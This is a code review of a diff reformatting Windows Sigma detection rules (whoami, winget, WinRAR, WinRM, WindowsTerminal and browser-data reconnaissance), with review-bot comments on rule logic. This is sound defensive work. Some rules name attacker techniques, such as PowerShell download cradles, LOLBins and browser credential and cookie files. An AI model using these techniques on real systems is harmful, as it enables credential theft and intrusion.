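Review bot: `selection_websites` lists both `cdn.discordapp.com` and `cdn.discordapp.com/attachments/` under `CommandLine|contains`; the first already matches every command line the second does, so the second entry is dead and only invites the two to drift apart. Drop `- cdn.discordapp.com/attachments/`, or keep only the narrower form if the intent is to match attachment URLs specifically. The new comment on `.githubusercontent.com` is useful; if the remaining entries came from the WithSecure FIN7/Veeam IOC list cited in `references`, a one-line comment saying so above the list would make later additions traceable.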
diff --git a/sigma/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml b/sigma/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml index be2a73c3f..efade9eef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml @@ -1,16 +1,10 @@ title: Suspicious Where Execution id: 725a9768-0f5e-4cb3-aec2-bc5719c6831a status: test -description: 'Adversaries may enumerate browser bookmarks to learn more about compromised - hosts. - - Browser bookmarks may reveal personal information about users (ex: banking sites, - interests, social media, etc.) as well as details about - - internal network resources such as servers, tools/dashboards, or other related - infrastructure. - - ' +description: | + Adversaries may enumerate browser bookmarks to learn more about compromised hosts. + Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about + internal network resources such as servers, tools/dashboards, or other related infrastructure. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -27,10 +21,11 @@ detection: EventID: 4688 Channel: Security where_exe: - - NewProcessName|endswith: \where.exe - - OriginalFileName: where.exe + - NewProcessName|endswith: \where.exe + - OriginalFileName: where.exe where_opt: - CommandLine|contains: + CommandLine|contains: + # Firefox Data - places.sqlite - cookies.sqlite - formhistory.sqlite @@ -38,6 +33,7 @@ detection: - key4.db - key3.db - sessionstore.jsonlz4 + # Chrome Data - History - Bookmarks - Cookies 
diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_all_execution.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_all_execution.yml index d7bb0d0b2..e22236858 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_all_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_all_execution.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_main_img: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_main_cli: - CommandLine|contains: + CommandLine|contains: - ' -all' - ' /all' condition: process_creation and (all of selection_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_execution.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_execution.yml index 2f0e4e816..3d93e6041 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_execution.yml @@ -1,8 +1,7 @@ title: Whoami Utility Execution id: e28a5a99-da44-436d-b7a0-2afc20a5f413 status: test -description: Detects the execution of whoami, which is often used by attackers after - exploitation / privilege escalation +description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ @@ -21,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe condition: process_creation and selection falsepositives: - Admin activity 
diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml index f11b2c34e..04c66d9df 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml @@ -1,11 +1,10 @@ title: Whoami.EXE Execution From Privileged Process id: 79ce34ca-af29-4d0e-b832-fc1b377020db related: - - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 - type: obsoletes + - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 + type: obsoletes status: experimental -description: Detects the execution of "whoami.exe" by privileged accounts that are - often abused by threat actors +description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://nsudo.m2team.org/en-us/ @@ -24,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: whoami.exe - - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe selection_user: SubjectUserName|contains: - AUTHORI diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml index a5c583288..ce6222779 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_groups_discovery.yml 
@@ -1,9 +1,7 @@ title: Group Membership Reconnaissance Via Whoami.EXE id: bd8b828d-0dca-48e1-8a63-8a58ecf2644f status: test -description: Detects the execution of whoami.exe with the /group command line flag - to show group membership for the current user, account type, security identifiers - (SID), and attributes. +description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /groups' - ' -groups' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_output.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_output.yml index 90b496eb1..57b738f4f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_output.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_output.yml 
@@ -1,9 +1,7 @@ title: Whoami.EXE Execution With Output Option id: c30fb093-1109-4dc8-88a8-b30d11c95a5d status: experimental -description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV - as output format or with redirection options to export the results to a file for - later use. +description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use. references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ @@ -23,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_main_img: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_main_cli: - CommandLine|contains: + CommandLine|contains: - ' /FO CSV' - ' -FO CSV' selection_special: - CommandLine|contains: whoami*> + CommandLine|contains: whoami*> condition: process_creation and (all of selection_main_* or selection_special) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml index f1b1dffbb..63a1913b1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_parent_anomaly.yml @@ -21,9 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe filter_main_known_parents: + # This list can be any legitimate shell or application that you expect whoami to run from ParentProcessName|endswith: - \cmd.exe - \powershell_ise.exe 
@@ -32,11 +33,10 @@ detection: filter_optional_ms_monitoring_agent: ParentProcessName|endswith: :\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe filter_main_parent_null: - ParentProcessName: null + ParentProcessName: filter_main_parent_empty: ParentProcessName: '' - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml index 0c62ffda4..57d1fa497 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_priv_discovery.yml @@ -1,9 +1,7 @@ title: Security Privileges Enumeration Via Whoami.EXE id: 97a80ec7-0e2f-4d05-9ef4-65760e634f6b status: test -description: Detects a whoami.exe executed with the /priv command line flag instructing - the tool to show all current user privileges. This is often used after a privilege - escalation attempt. +description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami author: Florian Roth (Nextron Systems) @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /priv' - ' -priv' condition: process_creation and (all of selection_*) 
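Review bot: `filter_main_parent_null` now reads `ParentProcessName:` with no value instead of `ParentProcessName: null`; both parse to a YAML null, so the match is unchanged, but the bare key is easy to misread as an unfinished edit, especially next to `filter_main_parent_empty: ParentProcessName: ''` where the null-versus-empty distinction is the whole reason there are two filters. Keeping the explicit `ParentProcessName: null` (the form the Sigma specification documents for a null-field match) costs nothing and makes the intent visible. If the conversion tooling rewrites it this way automatically, a short comment `# absent (null) parent, distinct from the empty-string case below` would serve the same purpose.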
diff --git a/sigma/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/sigma/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml index ac4b26731..af85ef486 100644 --- a/sigma/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml +++ b/sigma/builtin/process_creation/proc_creation_win_windows_terminal_susp_children.yml @@ -1,8 +1,7 @@ title: Suspicious WindowsTerminal Child Processes id: 8de89e52-f6e1-4b5b-afd1-41ecfa300d48 status: test -description: Detects suspicious children spawned via the Windows Terminal application - which could be a sign of persistence via WindowsTerminal (see references section) +description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) references: - https://persistence-info.github.io/Data/windowsterminalprofile.html - https://twitter.com/nas_bench/status/1550836225652686848 
@@ -24,40 +23,43 @@ detection: - \WindowsTerminal.exe - \wt.exe selection_susp: - - NewProcessName|endswith: - - \rundll32.exe - - \regsvr32.exe - - \certutil.exe - - \cscript.exe - - \wscript.exe - - \csc.exe - - NewProcessName|contains: - - C:\Users\Public\ - - \Downloads\ - - \Desktop\ - - \AppData\Local\Temp\ - - \Windows\TEMP\ - - CommandLine|contains: - - ' iex ' - - ' icm' - - Invoke- - - 'Import-Module ' - - 'ipmo ' - - DownloadString( - - ' /c ' - - ' /k ' - - ' /r ' + - NewProcessName|endswith: + # Add more LOLBINS + - \rundll32.exe + - \regsvr32.exe + - \certutil.exe + - \cscript.exe + - \wscript.exe + - \csc.exe + - NewProcessName|contains: + # Add more suspicious paths + - C:\Users\Public\ + - \Downloads\ + - \Desktop\ + - \AppData\Local\Temp\ + - \Windows\TEMP\ + - CommandLine|contains: + # Add more suspicious commandline + - ' iex ' + - ' icm' + - Invoke- + - 'Import-Module ' + - 'ipmo ' + - DownloadString( + - ' /c ' + - ' /k ' + - ' /r ' filter_builtin_visual_studio_shell: - CommandLine|contains|all: + CommandLine|contains|all: - Import-Module - Microsoft.VisualStudio.DevShell.dll - Enter-VsDevShell filter_open_settings: - CommandLine|contains|all: + CommandLine|contains|all: - \AppData\Local\Packages\Microsoft.WindowsTerminal_ - \LocalState\settings.json filter_vsdevcmd: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Program Files\Microsoft Visual Studio\ - \Common7\Tools\VsDevCmd.bat condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml b/sigma/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml index 73bdd0311..b81bc0085 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winget_add_custom_source.yml 
@@ -1,10 +1,10 @@ title: Add New Download Source To Winget id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 related: - - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 - type: similar - - id: c15a46a0-07d4-4c87-b4b6-89207835a83b - type: similar + - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 + type: similar + - id: c15a46a0-07d4-4c87-b4b6-89207835a83b + type: similar status: experimental description: Detects usage of winget to add new additional download sources references: @@ -24,10 +24,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \winget.exe - - OriginalFileName: winget.exe + - NewProcessName|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml b/sigma/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml index 5b3ff7c72..f7f0b3048 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml 
@@ -1,17 +1,14 @@ title: Add Insecure Download Source To Winget id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 related: - - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 - type: similar - - id: c15a46a0-07d4-4c87-b4b6-89207835a83b - type: similar + - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 + type: similar + - id: c15a46a0-07d4-4c87-b4b6-89207835a83b + type: similar status: experimental -description: 'Detects usage of winget to add a new insecure (http) download source. - - Winget will not allow the addition of insecure sources, hence this could indicate - potential suspicious activity (or typos) - - ' +description: | + Detects usage of winget to add a new insecure (http) download source. + Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) references: - https://learn.microsoft.com/en-us/windows/package-manager/winget/source - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget @@ -29,10 +26,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \winget.exe - - OriginalFileName: winget.exe + - NewProcessName|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' - http:// diff --git a/sigma/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml b/sigma/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml index 2d52b19d3..c1dd89d2e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winget_add_susp_custom_source.yml 
@@ -1,10 +1,10 @@ title: Add Potential Suspicious New Download Source To Winget id: c15a46a0-07d4-4c87-b4b6-89207835a83b related: - - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 - type: similar - - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 - type: similar + - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842 + type: similar + - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 + type: similar status: experimental description: Detects usage of winget to add new potentially suspicious download sources references: @@ -25,14 +25,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \winget.exe - - OriginalFileName: winget.exe + - NewProcessName|endswith: \winget.exe + - OriginalFileName: winget.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'source ' - 'add ' selection_source_direct_ip: - CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} + # This is a best effort. A better way to handle this is to limit it via whitelist. Check Group Policy for more details + CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml b/sigma/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml index ee617d357..f67fe3ea2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winget_local_install_via_manifest.yml 
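Review bot: The `selection_source_direct_ip` regex fires on any IPv4 literal, including internal winget mirrors on private ranges, yet `falsepositives` still lists only `Unknown`, and IPv6 literals (`://[...]`) are not covered at all. I would add `- Internal winget repositories or mirrors addressed by IP instead of hostname` under falsepositives. The new comment is also vaguer than it needs to be; something like `# Best effort: matches any IPv4 literal (not IPv6). Restricting allowed sources via the winget source Group Policy is the stronger control` names the actual control, assuming that is the policy the comment has in mind.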
@@ -1,15 +1,10 @@ title: Install New Package Via Winget Local Manifest id: 313d6012-51a0-4d93-8dfc-de8553239e25 status: experimental -description: 'Detects usage of winget to install applications via manifest file. Adversaries - can abuse winget to download payloads remotely and execute them. - - The manifest option enables you to install an application by passing in a YAML - file directly to the client. - +description: | + Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. + The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later. - - ' references: - https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install - https://lolbas-project.github.io/lolbas/Binaries/Winget/ @@ -29,19 +24,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \winget.exe - - OriginalFileName: winget.exe + - NewProcessName|endswith: \winget.exe + - OriginalFileName: winget.exe selection_install_flag: - CommandLine|contains: + CommandLine|contains: - install - - ' add ' + - ' add ' # https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCLICore/Commands/InstallCommand.h selection_manifest_flag: - CommandLine|contains: + CommandLine|contains: - '-m ' - --manifest condition: process_creation and (all of selection_*) falsepositives: - - Some false positives are expected in some environment that may use this functionality - to install and test their custom applications + - Some false positives are expected in some environment that may use this functionality to install and test their custom applications level: medium ruletype: Sigma 
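Review bot: `selection_install_flag` matches the bare substring `install`, which is also contained in `uninstall`, so a `winget uninstall -m <manifest>` invocation (if winget accepts a manifest there) would fire a rule titled "Install New Package"; the leading-space form `- ' install'` mirrors the `' add '` entry below it and excludes `uninstall` while still matching `winget install`. The InstallCommand.h link attached to the `' add '` entry does not by itself explain the entry; a one-liner such as `# 'add' is an alias of 'install'` would save the next reader the lookup.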
diff --git a/sigma/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml b/sigma/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml index 2d19febf0..102d72de0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml @@ -1,11 +1,10 @@ title: Winrar Compressing Dump Files id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc related: - - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 - type: similar + - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 + type: similar status: experimental -description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" - extension, which could be a step in a process of dump file exfiltration. +description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ author: Florian Roth (Nextron Systems) @@ -22,19 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \rar.exe - - \winrar.exe - - Description: Command line RAR + - NewProcessName|endswith: + - \rar.exe + - \winrar.exe + - Description: Command line RAR selection_extension: - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears - accidentally + - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting level: medium ruletype: Sigma 
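Review bot: In `selection_img` the `Description: Command line RAR` alternative cannot match on this rule's own log source: it is pinned to `Channel: Security` / `EventID: 4688`, and to my knowledge 4688 populates neither Description nor OriginalFileName (those are Sysmon Event 1 fields). The selection therefore silently degrades to the `NewProcessName` suffix check, and a renamed `rar.exe` — the case the Description match is presumably there for — is missed. If keeping the field is a deliberate choice of the conversion, say so in place, e.g. `# Description is not populated by Security 4688; only effective with Sysmon-enriched data`, otherwise drop it so the rule does not promise coverage it cannot deliver.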
diff --git a/sigma/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml index 6e1b046cc..2aaddd7c7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrar_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious Child Process Of WinRAR.EXE id: 146aace8-9bd6-42ba-be7a-0070d8027b76 related: - - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 - type: similar + - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 + type: similar status: experimental description: Detects potentially suspicious child processes of WinRAR.exe. references: @@ -23,24 +23,25 @@ detection: selection_parent: ParentProcessName|endswith: \WinRAR.exe selection_binaries: - - NewProcessName|endswith: - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - mshta.exe - - PowerShell.EXE - - pwsh.dll - - regsvr32.exe - - RUNDLL32.EXE - - wscript.exe + # Note: add additional binaries that the attacker might use + - NewProcessName|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - mshta.exe + - PowerShell.EXE + - pwsh.dll + - regsvr32.exe + - RUNDLL32.EXE + - wscript.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml b/sigma/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml index 7c9a52156..ffad2e3a7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml 
@@ -1,8 +1,7 @@ title: Winrar Execution in Non-Standard Folder id: 4ede543c-e098-43d9-a28f-dd784a13132f status: test -description: Detects a suspicious winrar execution in a folder which is not the default - installation folder +description: Detects a suspicious winrar execution in a folder which is not the default installation folder references: - https://twitter.com/cyb3rops/status/1460978167628406785 author: Florian Roth (Nextron Systems), Tigzy @@ -19,20 +18,21 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \rar.exe - - \winrar.exe - - Description: Command line RAR + - NewProcessName|endswith: + - \rar.exe + - \winrar.exe + - Description: Command line RAR filter_main_unrar: - NewProcessName|endswith: \UnRAR.exe + # Note: we filter unrar as it has the same description as the other utilities, and we're only interested in compression + NewProcessName|endswith: \UnRAR.exe filter_main_path: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\WinRAR\ - :\Program Files\WinRAR\ filter_optional_temp: - NewProcessName|contains: :\Windows\Temp\ - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + # Note: in some occasion installers were seen dropping "rar" in TEMP + NewProcessName|contains: :\Windows\Temp\ + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate use of WinRAR in a folder of a software that bundles WinRAR level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml index 68966d53f..545da510f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrm_awl_bypass.yml 
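Review bot: `filter_optional_temp` excludes every archiver binary under `:\Windows\Temp\`, a directory that is also a common staging location for attacker-dropped tooling, so the exclusion trades a known installer false positive for a blind spot in exactly the non-standard-folder case this rule exists for. The new comment should spell that trade-off out so deployers can decide, e.g. `# Note: installers were seen dropping rar in TEMP; this also hides attacker-staged rar.exe there, disable where installers are not expected to run from TEMP`. Separately, `filter_main_unrar` only matters when `Description: Command line RAR` matched, and that field is not carried by Security 4688 as far as I know, so the unrar note should mention it is only relevant with Sysmon-style data.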
@@ -1,8 +1,7 @@ title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl id: 074e0ded-6ced-4ebd-8b4d-53f55908119d status: test -description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via - winrm.vbs and copied cscript.exe (can be renamed) +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) references: - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 author: Julia Fomina, oscd.community @@ -19,19 +18,18 @@ detection: EventID: 4688 Channel: Security contains_format_pretty_arg: - CommandLine|contains: + CommandLine|contains: - format:pretty - format:"pretty" - format:"text" - format:text image_from_system_folder: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ contains_winrm: - CommandLine|contains: winrm - condition: process_creation and (contains_winrm and (contains_format_pretty_arg - and not image_from_system_folder)) + CommandLine|contains: winrm + condition: process_creation and (contains_winrm and (contains_format_pretty_arg and not image_from_system_folder)) falsepositives: - Unlikely level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml b/sigma/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml index 9632692a5..7155d2fef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml 
@@ -1,8 +1,7 @@ title: Remote Code Execute via Winrm.vbs id: 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0 status: test -description: Detects an attempt to execute code or create service on remote host via - winrm.vbs. +description: Detects an attempt to execute code or create service on remote host via winrm.vbs. references: - https://twitter.com/bohops/status/994405551751815170 - https://redcanary.com/blog/lateral-movement-winrm-wmi/ @@ -21,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cscript.exe - - OriginalFileName: cscript.exe + # Note: winrm.vbs can only be run by a process named cscript (see "IsCScriptEnv" function) + - NewProcessName|endswith: \cscript.exe + - OriginalFileName: cscript.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - winrm - invoke Create wmicimv2/Win32_ - -r:http diff --git a/sigma/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml b/sigma/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml index 71c8b6009..9e3c54d30 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml @@ -1,9 +1,7 @@ title: Remote PowerShell Session Host Process (WinRM) id: 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 status: test -description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM - host process) as a parent or child process (sign of an active PowerShell remote - session). +description: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). references: - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html author: Roberto Rodriguez @Cyb3rWard0g 
@@ -21,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \wsmprovhost.exe - - ParentProcessName|endswith: \wsmprovhost.exe + - NewProcessName|endswith: \wsmprovhost.exe + - ParentProcessName|endswith: \wsmprovhost.exe condition: process_creation and selection fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml index 73fc3df12..44b5f80db 100644 --- a/sigma/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_winrm_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Processes Spawned by WinRM id: 5cc2cda8-f261-4d88-a2de-e9e193c86716 status: test -description: Detects suspicious processes including shells spawnd from WinRM host - process +description: Detects suspicious processes including shells spawnd from WinRM host process author: Andreas Hunkeler (@Karneades), Markus Neis date: 2021/05/20 modified: 2022/07/14 @@ -20,7 +19,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \wsmprovhost.exe - NewProcessName|endswith: + 